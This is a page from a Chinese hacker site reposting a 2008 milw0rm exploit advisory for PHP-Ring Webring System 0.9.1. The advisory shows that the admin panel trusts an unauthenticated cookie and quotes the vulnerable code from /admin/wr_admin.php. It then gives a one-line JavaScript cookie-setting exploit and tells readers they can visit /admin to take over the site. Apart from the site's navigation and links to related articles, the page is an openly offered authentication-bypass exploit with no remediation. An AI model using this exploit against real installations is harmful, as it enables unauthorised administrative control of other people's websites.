| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> 漏洞 >> web apps >> 正文 用户登录 新用户注册
不安全cookie处理脆弱性         ★★★ 【字体:
PHP-Ring Webring System 0.9.1 Insecure Cookie Handling Vulnerability
作者:milw0rm 文章来源:milw0rm 点击数: 更新时间:2008-8-12
###############################################################################################
  #                                                                                             #
  #    ...:::::PHP-Ring Webring System v0.9.1 Insecure Cookie Handling Vulnerability ::::....   #          
  ###############################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
DESCRIPTION:
PHP-Ring Webring System , suffers from insecure cookie handling, when a admin login is successfull the script creates
a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
logged in as a legit admin.
---
vuln code in /admin/wr_admin.php

$cookie = $_COOKIE[admin]; //check for cookie

if (($cookie == "" OR $_GET[stop] == 1 OR !is_admin($cookie)) && $_GET[op] != "login" && $_GET[op] != "logout") {
    include("../templates/wr_header.php");
    echo "Enter admin username and password to log in";
    ....
    ....
    ..
    } else {
function adminhome() // load admin settings

---
exploit:
javascript:document.cookie = "admin=1; path=/";
-----
now visit /admin and  you can get admin access and manage the cms ;)
-------
young iranian h4ck3rz

# milw0rm.com
责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇漏洞:

  • 下一篇漏洞:
  • 最新hack更新
    最新推荐资讯
    相关漏洞
    Cookie远程SQL注入漏洞
    cookie处理的脆弱性
    简单PHP执行代码利用
    php远程SQL注入漏洞
    PHP 多个远程漏洞
    PHP的SQL注入漏洞
    PHP不安全cookie处理脆弱性
    cookie处理的脆弱性
    不安全的cookie的脆弱性
    php 本地文件的脆弱性
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号